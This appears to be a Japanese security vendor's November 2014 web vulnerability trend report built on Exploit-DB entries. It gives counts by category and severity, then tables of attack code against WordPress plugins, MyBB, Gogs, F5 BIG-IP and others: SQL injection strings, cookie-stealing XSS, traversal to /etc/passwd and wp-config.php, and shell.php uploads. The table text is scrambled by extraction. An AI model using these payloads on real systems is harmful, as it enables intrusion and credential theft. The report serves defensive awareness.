close

Enter

Log in using OpenID

2014年11月EDB-Report ダウンロード

embedDownload
2014.11
EDB-Report
最新Web脆弱性トレンドレポート(2014.11)
2014.11.01~2014.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム
サマリー
2014年11月は、Exploit-DBより公開されている脆弱性の中、SQLインジェクション(SQL Injection)の攻撃が最も多かった月です。分析されたSQLインジェクションの攻撃パターンは、攻撃
実行の難易度は難のレベルであり、危険度も高以上のレベルの脆弱性が多く見られました。管理者は、アップデートおよび定期的セキュリティパッチを実施するとともにSQLインジェクション攻撃に
さらされないように注意をしなければなりません。主なソフトウェアの脆弱性の傾向では、オープンソースCMSであるWordpressとWebsiteBakerにて最も多く見られているため、定期的セキュリ
ティパッチを実施することで当該の脆弱性に対し対応を行うことを推奨します。
1. 脆弱性別件数
19
脆弱性カテゴリ
16脆弱性別件数
件数
SQLインジェクション
(SQL Injection)
クロス サイト スクリプティング
(Cross Site Scripting:XSS)
ローカルファイル挿入
20
15
19
10
7
16
2
7
(Local File Inclusion:LFI)
5
0
ファイルアップロード
2
(File Upload)
合計
44
危険度別分類
2. 危険度別件数
危険度
件数
割合
早急対応要
13
30%
高
中
合計
31
0
44
70%
0%
100%
0
13
早急対応要
高
中
31
3. 攻撃実行の難易度別件数
難易度
件数
割合
攻撃実行の難易度別件数
難
中
易
合計
6
5
33
44
14%
11%
75%
100%
6
難
5
中
易
33
4. 主なソフトウェア別脆弱性発生件数
ソフトウェア名
件数
Wordpress
WebsiteBaker
MyBB
Gogs
Modx
Symantec Endpoint Protection
Serenity
PHP-Fusion
vldPersonals
ManageEngine OpManager
Joomla
Progress OpenEdge
Subex
phpSound Music Sharing Platform
F5 BIG-IP
Piwigo
Zoph
RobotStats
phpMyRecipes
合計
9
7
4
3
2
2
2
2
2
2
1
1
1
1
1
1
1
1
1
主なソフトウェア別脆弱性発生件数
10
Wordpress
9
9
WebsiteBaker
8
7
MyBB
7
6
Gogs
5
Modx
4
4
3
Symantec Endpoint
Protection
3
Serenity
2 2 2 2 2 2
2
1
1 1 1 1 1 1 1 1 1
PHP-Fusion
vldPersonals
0
44
Copyright 2014 Penta Security Systems Inc. All rights reserved
ManageEngine OpManager
Joomla
EDB-Report
最新Web脆弱性トレンドレポート(2014.11)
2014.11.01~2014.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
危険度分類基準
早急対応要:攻撃が成功した場合システムへ侵入可
高:システム情報を取得するか、あるいはクライアントに2次被害を及ぼす
中:情報漏洩
攻撃実行難易度分類基準
難:複数の脆弱性を突いた攻撃パターン、対象のシステムの重要な情報を取得
するため、高度な攻撃コードを採用したパターン、知らされていない攻撃
コードを採用したパターンのいずれかに該当する
中:攻撃手法自体は難しくないが、迂回コードを採用したパターン
易:1回のリクエストで攻撃が成立するパターン、複数回トライするも、
既知の攻撃コードを採用したパターンのいずれかに該当する
** 5件以上発生した主なソフトウェア別脆弱性の詳細情報
EDB 番号
脆弱性カテゴリ
攻撃難易度
危険度
脆弱性名
35204
SQL Injection
中
早急対応要
Another Wordpress Classifieds Plugin - / SQL Injection 脆弱性
Wordpress
35212
LFI
易
早急対応要
Wordpress
35303
LFI
易
高
35313
SQL Injection
易
高
35341
File Upload
易
高
35340
SQL Injection
易
高
35371
SQL Injection
難
早急対応要
35346
LFI
易
高
XCloner Wordpress/Joomla! Plugin - admin-ajax.php LFI 脆弱性
Paid Memberships Pro 1.7.14.2 - admin-ajax.php SQL Injection 脆
弱性
Wordpress SP Client Document Manager Plugin 2.4.1 - /sp-clientdocument-manager/ajax.php SQL Injection 脆弱性
Wordpress wpDataTables Plugin 1.5.3 - admin-ajax.php File
Upload 脆弱性
Wordpress wpDataTables Plugin 1.5.3 - admin-ajax.php SQL
Injection 脆弱性
Wordpress Google Document Embedder 2.5.14 - view.php SQL
Injection 脆弱性
DukaPress 2.5.2 - dp_image.php LFI 脆弱性
35378
LFI
易
早急対応要
Wordpress DB Backup Plugin - download.php LFI 脆弱性
Wordpress
35277
SQL Injection
易
高
WebsiteBaker 2.8.3 - modify.php SQL Injection 脆弱性
WebsiteBaker
35277
XSS
易
高
WebsiteBaker 2.8.3 - tool.php XSS 脆弱性
WebsiteBaker
35277
XSS
易
高
WebsiteBaker 2.8.3 - edit_module_files.php XSS 脆弱性
WebsiteBaker
35277
XSS
易
高
WebsiteBaker 2.8.3 - add_post.php XSS 脆弱性
WebsiteBaker
35277
XSS
易
高
WebsiteBaker 2.8.3 - modify_group.php XSS 脆弱性
WebsiteBaker
35277
XSS
易
高
WebsiteBaker 2.8.3 - modify_post.php XSS 脆弱性
WebsiteBaker
35277
XSS
易
高
WebsiteBaker 2.8.3 - modify_settings.php XSS 脆弱性
WebsiteBaker
Copyright 2014 Penta Security Systems Inc. All rights reserved
ソフトウェア名
Wordpress
Wordpress
Wordpress
Wordpress
Wordpress
Wordpress
EDB-Report
最新Web脆弱性トレンドレポート(2014.11)
2014.11.01~2014.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
2014/11/1
EDB番号
35127
脆弱性カテゴリ
LFI
攻撃難易度
易
危険度
対象プログラム
対象環境
Progress
OpenEdge
Progress
OpenEdge
11.2
Subex
Subex FMS 7.4
高
Modx CMS 2.2.14 /day/modx/manager/index.php?a=55&class_key
/day/modx/manager/index =modStaticResource&context_key="></script>
.php XSS 脆弱性(1)
<img src=x onerror=prompt(/XSS/)>
Modx
Modx CMS
2.2.14
高
Modx CMS 2.2.14 /day/modx/manager/index.php?id=1&context=<
/day/modx/manager/index
script>alert(1)</script>
.php XSS 脆弱性(2)
Modx
Modx CMS
2.2.14
高
Symantec Endpoint
/console/Highlander_docs/SSOProtection 12.1.4023.4080
Error.jsp?ErrorMsg=<script>alert('xss')</script>
- SSO-Error.jsp XSS 脆弱性
Symantec
Endpoint
Protection
高
Symantec Endpoint
Protection 12.1.4023.4080 servlet/ConsoleServlet?ActionType=/../../../../../.
- /servlet/ConsoleServlet ./../../../../WINDOWS/win.ini%00
LFI 脆弱性
Symantec
Endpoint
Protection
12.1.4023.408
0
Symantec
Symantec
Endpoint
Protection
高
脆弱性名
攻撃コード
Progress OpenEdge 11.2 - /report/reportViewAction.jsp?selection=../../../../
reportViewAction.jsp LFI
../../../..
脆弱性
/../../windows/win.ini
POST /login/login HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1;
WOW64 AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-formurlencoded; charset=UTF-8
2014/11/1
2014/11/5
2014/11/5
2014/11/6
2014/11/6
2014/11/10
35214
35159
35159
35181
35181
35197
SQL Injection
XSS
XSS
XSS
LFI
File Upload
難
易
易
易
易
易
Subex FMS 7.4 - /login
早急対応要
SQL Injection 脆弱性
高
ranger_user[name]=admin' AND 3402=(CASE
WHEN (ASCII(SUBSTRC((SELECT (CASE WHEN
((SELECT GRANTED_ROLE FROM
DBA_ROLE_PRIVS WHERE GRANTEE=USER AND
GRANTED_ROLE=CHR(68)||CHR(66)||CHR(65))
=CHR(68)||CHR(66)||CHR(65)) THEN 1 ELSE 0
END) FROM DUAL),1,1)) > 47) THEN
DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR
(102)||CHR(100)||CHR(114),5) ELSE 3402
END) AND
'a'='a&ranger_user[password]=secuid0&commit
=Login&ranger_user_i2[features]=0
POST /demo/serenity-cc/ HTTP/1.1
Host:
Connection: Close
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0;
Windows NT 6.2; WOW64; Trident/6.0)
Serenity Client
Content-Type: multipart/form-data; boundary=Management Portal 1.0.1 - --------------------------7dd10029908f2
/serenity-cc/ File Upload
脆弱性
-----------------------------7dd10029908f2
Content-Disposition: form-data; name="edit";
filename="shell.php"
Content-Type: application/octet-stream
<?php echo ?>
-----------------------------7dd10029908f2--
Copyright 2014 Penta Security Systems Inc. All rights reserved
Serenity
Endpoint
Protection
12.1.4023.408
0
Serenity Client
Management
Portal 1.0.1
EDB-Report
最新Web脆弱性トレンドレポート(2014.11)
2014.11.01~2014.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
EDB番号
脆弱性カテゴリ
攻撃難易度
危険度
脆弱性名
攻撃コード
対象プログラム
対象環境
Serenity
Serenity Client
Management
Portal 1.0.1
POST /serenity-cc/ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1;
WOW64 AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-formurlencoded; charset=UTF-8
2014/11/10
2014/11/10
2014/11/10
35197
35206
35206
XSS
SQL Injection
SQL Injection
易
易
易
高
Serenity Client
Management Portal 1.0.1 - edit=user&object=1&userfname=%22%3E%3Cs
/serenity-cc/ XSS 脆弱性
cript%3Ealert(document.cookie)%3B%3C%2Fscr
ipt%3E&userlname=%22%3E%3Cscript%3Ealert
(document.cookie)%3B%3C%2Fscript%3E&user
email=&userpassword=&userhome=&usercell=&
userwork=&userfax=&useraddone=&useraddtwo
=&usercity=&userstate=&userzip=&country=Uni
ted+States&userwebsite=&userskype=&useryah
oo=&userfb=&usertwitter=&usergoogle=&userli
nkedin=
高
PHP-Fusion 7.02.07 submissions.php SQL
Injection 脆弱性
/PHPFusion/files/administration/submissions.php?acti
on=2&aid=9b23a9871adc75
cd&submit_id=1%20and%201=1--&t=n
PHP-Fusion
PHP-Fusion
7.02.07
高
PHP-Fusion 7.02.07 members.php SQL
Injection 脆弱性
/PHPFusion/files/administration/members.php?aid=9b
23a9871adc75cd&status=4%20and%201=1--
PHP-Fusion
PHP-Fusion
7.02.07
Wordpress
Another
Wordpress
Classifieds
Plugin
vldPersonals
vldPersonals
2.7
vldPersonals
vldPersonals
2.7
Wordpress
Wordpress
XCloner Plugin
POST /?page_id=16592 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1;
WOW64 AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-formurlencoded; charset=UTF-8
2014/11/10
35204
SQL Injection
중
2014/11/10
35193
XSS
易
2014/11/10
35193
SQL Injection
中
Another Wordpress
早急対応要 Classifieds Plugin - / SQL
Injection 脆弱性
高
vldPersonals 2.7 index.php XSS 脆弱性
a=dosearch&keywordphrase=k'||(SELECT 'ICab'
FROM DUAL WHERE 6152=6152 AND
SLEEP(5))||'&searchcategory=&searchname=&s
earchpricemin=1&searchpricemax=2&selectcountry0.2917955784677633=&textfieldcountry0.2917955784677633=country®
ions[0][country]=country&selectstate0.3360776012424508=&textfieldstate0.3360776012424508=state®
ions[0][state]=State&selectcity0.8672109586380441=&textfieldcity0.8672109586380441=city®
ions[0][city]=city
/index.php?m=member_profile&p=profile&id=98
11c”><script>alert(1)<%2fscript>b7ec317c816
POST /index.php?m=search HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1;
WOW64 AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
vldPersonals 2.7 Accept: */*
早急対応要 index.php SQL Injection 脆 Content-Type: application/x-www-form弱性
urlencoded; charset=UTF-8
age_from=19&age_to=19&issearch=1&submit=
Search&gender1=2&gender2=2&type_id=memb
ers&country=1%20and%20benchmark(2000000
0%2csha1(1))–%20
2014/11/10
35212
LFI
易
XCloner
Wordpress/Joomla! Plugin
早急対応要
- admin-ajax.php LFI 脆弱
性
/wp-admin/adminajax.php?action=json_return&page=xcloner_sho
w&option=com_cloner&task=download&file=../..
/../../etc/passwd
Copyright 2014 Penta Security Systems Inc. All rights reserved
EDB-Report
最新Web脆弱性トレンドレポート(2014.11)
2014.11.01~2014.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
EDB番号
脆弱性カテゴリ
攻撃難易度
危険度
2014/11/10
35209
SQL Injection
易
高
2014/11/10
2014/11/10
35209
35198
SQL Injection
XSS
易
易
高
高
脆弱性名
攻撃コード
対象プログラム
対象環境
POST
/servlet/APMBVHandler?OPERATION_TYPE=Dele
te&OPM_BVNAME=1%20and%201=1-HTTP/1.1
Host:
ManageEngine OpManager
ManageEngine ManageEngine
User-Agent: Mozilla/5.0 Windows NT 6.1;
- /APMBVHandler SQL
OpManager
OpManager
WOW64 AppleWebKit/535.7 KHTML, like Gecko
Injection 脆弱性
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-formurlencoded; charset=UTF-8
POST
/servlet/DataComparisonServlet?operation=com
pare&numPrimaryKey=1337&query=1%20and%
202=2-- HTTP/1.1
Host:
ManageEngine OpManager
User-Agent: Mozilla/5.0 Windows NT 6.1;
ManageEngine ManageEngine
- /DataComparisonServlet
WOW64 AppleWebKit/535.7 KHTML, like Gecko
OpManager
OpManager
SQL Injection 脆弱性
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-formurlencoded; charset=UTF-8
phpSound Music Sharing
Platform 1.0.5 -
phpSound
phpSound
/index.php?a=explore&filter=</title><script>ale
Music Sharing Music Sharing
rt(document.cookie);</script>
Platform
Platform 1.0.5
POST /mybb-1.8.1/member.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1;
WOW64 AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-formurlencoded; charset=UTF-8
2014/11/13
2014/11/13
2014/11/13
2014/11/13
35224
35224
35224
35220
SQL Injection
XSS
XSS
SQL Injection
難
易
易
難
regcheck1=®
MyBB 1.8.X - member.php
早急対応要
check2=true&username=woot&password=rando
SQL Injection 脆弱性
m&password2=random&email=woot%40woot.co
m&email2=woot%40woot.com&referrername=&
imagestring=6cj5n&imagehash=b2dee8e4028e9
cad37e30c31753dfe01&answer=4&question_id=
C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORD
ER+BY+9#&allownotices=1&receivepms=1&pm
notice=1&subscriptionmethod=0&timezoneoffset
=0&dstcorrection=2®
time=1415880544&step=registration&action=do
_register
MyBB
MyBB 1.8.X
高
/mybbMyBB 1.8.X - member.php
1.8.1/report.php?type=XSS%22%3E%3Cscript%
XSS 脆弱性
3Ealert%28666%29%3C%2fscript%3E&pid=1
MyBB
MyBB 1.8.X
高
MyBB 1.8.X - index.php
XSS 脆弱性
/mybb-1.8.1/admin/index.php?module=styletemplates&action=edit_template&title=calendar"
><script>alert(666)</script>&sid=1&expand=1
MyBB
MyBB 1.8.X
Joomla
Joomla HD FLV
Player <
2.1.0.1
Joomla HD FLV Player <
早急対応要 2.1.0.1 - index.php SQL
Injection 脆弱性
/index.php?option=com_hdflvplayer&id=9404%20UNION%20ALL%20SELECT%20CONCA
T%280x68306d336c34623174%2CIFNULL%28C
AST%28CURRENT_USER%28%29%20AS%20CH
AR%29%2C0x20%29%2C0x743162346c336d30
68%29
Copyright 2014 Penta Security Systems Inc. All rights reserved
EDB-Report
最新Web脆弱性トレンドレポート(2014.11)
2014.11.01~2014.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
2014/11/13
EDB番号
35222
脆弱性カテゴリ
LFI
攻撃難易度
易
危険度
高
脆弱性名
攻撃コード
POST /tmui/Control/form HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1;
WOW64 AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Referer:
https://<ip>/tmui/Control/jspmap/tmui/system/
archive/properties.jsp?name=../../../../../etc/pas
swd
Cookie :
JSESSIONID=6C6BADBEFB32C36CDE7A59C416
659494; f5advanceddisplay="";
BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB6
0417979CA1D9BE1D4;
BIGIPAuthUsernameCookie=admin;
F5_CURRENT_PARTITION=Common;
f5formpage="/tmui/system/archive/properties.js
p?&name=../../../../../etc/passwd";
f5currenttab="main"; f5mainmenuopenlist="";
f5_refreshpage=/tmui/Control/jspmap/tmui/syst
em/archive/properties.jsp%3Fname%3D../../../..
/../etc/passwd
F5 BIG-IP 10.1.0 Content-Type: application/x-www-form/tmui/Control/form LFI 脆
urlencoded; charset=UTF-8
弱性
対象プログラム
対象環境
F5 BIG-IP
F5 BIG-IP
10.1.0
Piwigo
Piwigo 2.6.0
_form_holder_opener_=&handler=%2Ftmui%2F
system%2Farchive%2Fproperties&handler_befor
e=%2Ftmui%2Fsystem%2Farchive%2Fpropertie
s&showObjList=&showObjList_before=&hideObjL
ist=&hideObjList_before=&enableObjList=&enabl
eObjList_before=&disableObjList=&disableObjLis
t_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2
b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b
&_bufvalue_validation=NO_VALIDATION&com.f5
.util.LinkedAdd.action_override=%2Ftmui%2Fsys
tem%2Farchive%2Fproperties&com.f5.util.Linke
dAdd.action_override_before=%2Ftmui%2Fsyste
m%2Farchive%2Fproperties&linked_add_id=&lin
ked_add_id_before=&name=..%2F..%2F..%2F..
%2F..%2Fetc%2Fpasswd&name_before=..%2F..
%2F..%2F..%2F..%2Fetc%2Fpasswd&form_pag
e=%2Ftmui%2Fsystem%2Farchive%2Fpropertie
s.jsp%3F&form_page_before=%2Ftmui%2Fsyst
em%2Farchive%2Fproperties.jsp%3F&download
_before=Download%3A+..%2F..%2F..%2F..%2F
..%2Fetc%2Fpasswd&restore_before=Restore&d
elete=Delete&delete_before=Delete
2014/11/13
35221
SQL Injection
易
高
POST
/piwigo/picture.php?/1/category/1&action=rate
HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1;
Piwigo 2.6.0 - picture.php WOW64 AppleWebKit/535.7 KHTML, like Gecko
SQL Injection 脆弱性
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-formurlencoded; charset=UTF-8
rate=1 and 2=2--
Copyright 2014 Penta Security Systems Inc. All rights reserved
EDB-Report
最新Web脆弱性トレンドレポート(2014.11)
2014.11.01~2014.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
2014/11/14
2014/11/14
2014/11/14
2014/11/17
2014/11/17
2014/11/17
2014/11/17
EDB番号
35238
35238
35237
35278
35277
35277
35277
脆弱性カテゴリ
SQL Injection
SQL Injection
SQL Injection
XSS
SQL Injection
XSS
XSS
攻撃難易度
攻撃コード
対象プログラム
対象環境
難
Gogs (users and repos q
pararm) 早急対応要
/api/v1/repos/search SQL
Injection 脆弱性
/api/v1/repos/search?q=%27)%09UNION%09SE
LECT%09*%09FROM%09(SELECT%09null)%09
AS%09a1%09%09JOIN%09(SELECT%091)%09
as%09u%09JOIN%09(SELECT%09user())%09A
S%09b1%09JOIN%09(SELECT%09user())%09A
S%09b2%09JOIN%09(SELECT%09null)%09as%
09a3%09%09JOIN%09(SELECT%09null)%09as
%09a4%09%09JOIN%09(SELECT%09null)%09a
s%09a5%09%09JOIN%09(SELECT%09null)%09
as%09a6%09%09JOIN%09(SELECT%09null)%0
9as%09a7%09%09JOIN%09(SELECT%09null)%
09as%09a8%09%09JOIN%09(SELECT%09null)
%09as%09a9%09JOIN%09(SELECT%09null)%0
9as%09a10%09JOIN%09(SELECT%09null)%09a
s%09a11%09JOIN%09(SELECT%09null)%09as
%09a12%09JOIN%09(SELECT%09null)%09as%
09a13%09%09JOIN%09(SELECT%09null)%09a
s%09a14%09%09JOIN%09(SELECT%09null)%0
9as%09a15%09%09JOIN%09(SELECT%09null)
%09as%09a16%09%09JOIN%09(SELECT%09n
ull)%09as%09a17%09%09JOIN%09(SELECT%0
9null)%09as%09a18%09%09JOIN%09(SELECT
%09null)%09as%09a19%09%09JOIN%09(SELE
CT%09null)%09as%09a20%09%09JOIN%09(SE
Gogs
Gogs
難
Gogs (users and repos q
pararm) 早急対応要
/api/v1/users/search SQL
Injection 脆弱性
/api/v1/users/search?q='/**/and/**/false)/**/u
nion/**/select/**/null,null,@@version,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null/**/fr
om/**/mysql.db/**/where/**/('%25'%3D'
Gogs
Gogs
中
Gogs (label pararm) 早急対応要 /user/repos/issues SQL
Injection 脆弱性
/user/repos/issues?label=' or
char_length(@@version) > 10 and
'|%'='&type=all&state=
Gogs
Gogs
高
Zoph 0.9.1 edit_photos.php XSS 脆弱
性
/zoph/php/edit_photos.php?photographer_id=3"
><script>alert(1)</script>
Zoph
Zoph 0.9.1
高
WebsiteBaker 2.8.3 modify.php SQL Injection
脆弱性
/wb/admin/pages/modify.php?page_id=1%20an
d%201=1--
WebsiteBaker
WebsiteBaker
2.8.3
高
WebsiteBaker 2.8.3 tool.php XSS 脆弱性
/wb/admin/admintools/tool.php?tool=captcha_co
ntrol&6d442"><script>alert(1)</script>8e3b12 WebsiteBaker
642a8=1
WebsiteBaker
2.8.3
高
/wb/modules/edit_module_files.php?page_id=1&
WebsiteBaker 2.8.3 mod_dir=news&edit_file=frontend.css&action=e
edit_module_files.php XSS
WebsiteBaker
dit&page_id=1&section_id=%007e393<script>al
脆弱性
ert(1)</script>9f8a40a7355f9acf0
WebsiteBaker
2.8.3
/wb/modules/news/add_post.php?page_id=1&se
ction_id=f953a"><script>alert(1)</script>4ddf3 WebsiteBaker
369c1f
WebsiteBaker
2.8.3
/wb/modules/news/modify_group.php?page_id=
1&section_id=%008cf03"><script>alert(1)</scri WebsiteBaker
pt>2680504c3ec&group_id=62be99873b33d1d3
WebsiteBaker
2.8.3
易
易
易
易
危険度
脆弱性名
2014/11/17
35277
XSS
易
高
WebsiteBaker 2.8.3 add_post.php XSS 脆弱性
2014/11/17
35277
XSS
易
高
WebsiteBaker 2.8.3 modify_group.php XSS 脆
弱性
2014/11/17
35277
XSS
易
高
WebsiteBaker 2.8.3 /wb/modules/news/modify_post.php?page_id=1
modify_post.php XSS 脆弱 &section_id=%003874a<script>alert(1)</script
性
>4194d511605&post_id=db89943875a2db52
高
WebsiteBaker 2.8.3 modify_settings.php XSS
脆弱性
2014/11/17
35277
XSS
易
WebsiteBaker
WebsiteBaker
2.8.3
/wb/modules/news/modify_settings.php?page_id
=1&section_id=%008b2f4"><script>alert(1)</s WebsiteBaker
cript>bdc8b3919b5
WebsiteBaker
2.8.3
Copyright 2014 Penta Security Systems Inc. All rights reserved
EDB-Report
最新Web脆弱性トレンドレポート(2014.11)
2014.11.01~2014.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
EDB番号
脆弱性カテゴリ
攻撃難易度
危険度
脆弱性名
攻撃コード
対象プログラム
対象環境
MyBB
MyBB Forums
1.8.2
Wordpress
Wordpress
Paid
Memberships
Pro 1.7.14.2
Wordpress
Wordpress
SP Client
Document
Manager
Plugin 2.4.1
Wordpress
Wordpress
wpDataTables
Plugin 1.5.3
POST /fuck/Upload/usercp.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1;
WOW64 AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-formurlencoded; charset=UTF-8
2014/11/17
2014/11/19
2014/11/21
35266
35303
35313
XSS
LFI
SQL Injection
易
易
易
高
MyBB Forums 1.8.2 usercp.php XSS 脆弱性
高
Paid Memberships Pro
/wp-admin/admin1.7.14.2 - admin-ajax.php
ajax.php?action=getfile&/../../wp-config.php
SQL Injection 脆弱性
高
my_post_key=6fa6202df4adac5d50bd19b0c120
4992&bday1=&bday2=&bday3=&birthdayprivacy
=all&website=http%3A%2F%2F&profile_fields%
5Bfid1%5D=&profile_fields%5Bfid2%5D=&profil
e_fields%5Bfid3%5D=Undisclosed&usertitle=%3
Cimg+src%3Dx+onerror%3Dalert%28%27XSS
%27%29%3B%3E&icq=&aim=&yahoo=&skype=
&google=&away=0&awayreason=&awayday=&a
waymonth=&awayyear=&action=do_profile®
submit=Update+Profile
POST /wordpress/wp-content/plugins/sp-clientdocument-manager/ajax.php?function=emailvendor HTTP/1.1
Wordpress SP Client
Host:
Document Manager Plugin User-Agent: Mozilla/5.0 Windows NT 6.1;
2.4.1 - /sp-clientWOW64 AppleWebKit/535.7 KHTML, like Gecko
documentChrome/16.0.912.75 Safari/535.7
manager/ajax.php SQL
Accept: */*
Injection 脆弱性
Content-Type: application/x-www-formurlencoded; charset=UTF-8
vendor_email[]=1 and 2=2--
2014/11/24
35341
File Upload
易
高
Wordpress wpDataTables
Plugin 1.5.3 - adminajax.php File Upload 脆弱性
POST /wp-admin/adminajax.php?action=wdt_upload_file HTTP/1.1
Host:
Connection: Close
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0;
Windows NT 6.2; WOW64; Trident/6.0)
Content-Type: multipart/form-data; boundary=--------------------------7dd10029908f2
-----------------------------7dd10029908f2
Content-Disposition: form-data;
name="Filedata"; filename="shell.php"
Content-Type: application/octet-stream
<?php echo ?>
-----------------------------7dd10029908f2--
2014/11/24
2014/11/24
2014/11/25
35340
35344
35371
SQL Injection
SQL Injection
SQL Injection
易
中
難
Wordpress wpDataTables
Plugin 1.5.3 - adminajax.php SQL Injection 脆
弱性
/wp-admin/adminajax.php?action=get_wdtable&table_id=1%20an
d%202=2--
Wordpress
Wordpress
wpDataTables
Plugin 1.5.3
RobotStats 1.0 早急対応要 robots.php SQL Injection
脆弱性
/robotstats/admin/robots.php?rub=modif&robot
=0x90+union+select+1,2,3,4,5,database(),7,8,9
,10
RobotStats
RobotStats 1.0
Wordpress Google
Document Embedder
早急対応要
2.5.14 - view.php SQL
Injection 脆弱性
/wp-content/plugins/google-documentembedder/view.php?embedded=1&gpid=0
UNION SELECT 1, 2, 3, CONCAT(CAST(CHAR(97,
58, 49, 58, 123, 115, 58, 54, 58, 34, 118, 119,
95, 99, 115, 115, 34, 59, 115, 58) as CHAR),
LENGTH(user_pass), CAST(CHAR(58, 34) as
CHAR), user_pass, CAST(CHAR(34, 59, 125) as
CHAR)) FROM `wp_users` WHERE ID=1
Wordpress
Wordpress
Google
Document
Embedder
2.5.14
高
Copyright 2014 Penta Security Systems Inc. All rights reserved
EDB-Report
最新Web脆弱性トレンドレポート(2014.11)
2014.11.01~2014.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
2014/11/25
EDB番号
35365
脆弱性カテゴリ
SQL Injection
攻撃難易度
中
危険度
脆弱性名
phpMyRecipes 1.2.2 早急対応要 dosearch.php SQL
Injection 脆弱性
攻撃コード
POST /phpMyReD44:I44cipes/dosearch.php
HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1;
WOW64 AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-formurlencoded; charset=UTF-8
対象プログラム
対象環境
phpMyRecipes
phpMyRecipes
1.2.2
Wordpress
Wordpress
DukaPress
2.5.2 Plugin
Wordpress
Wordpress DB
Backup Plugin
words_all=&words_exact=1 union select
null&words_any=&words_without=&name_exact
=&ing_modifier=2
2014/11/25
2014/11/26
35346
35378
LFI
LFI
易
易
高
DukaPress 2.5.2 dp_image.php LFI 脆弱性
/wpcontent/plugins/dukapress/lib/dp_image.php?src
=../../../../wp-config.php
Wordpress DB Backup
/wp-content/plugins/db早急対応要 Plugin - download.php LFI
backup/download.php?file=/etc/passwd
脆弱性
Copyright 2014 Penta Security Systems Inc. All rights reserved
Author
Document
Category
Uncategorized
Views
0
File Size
992 KB
Tags
1/--pages
Report inappropriate content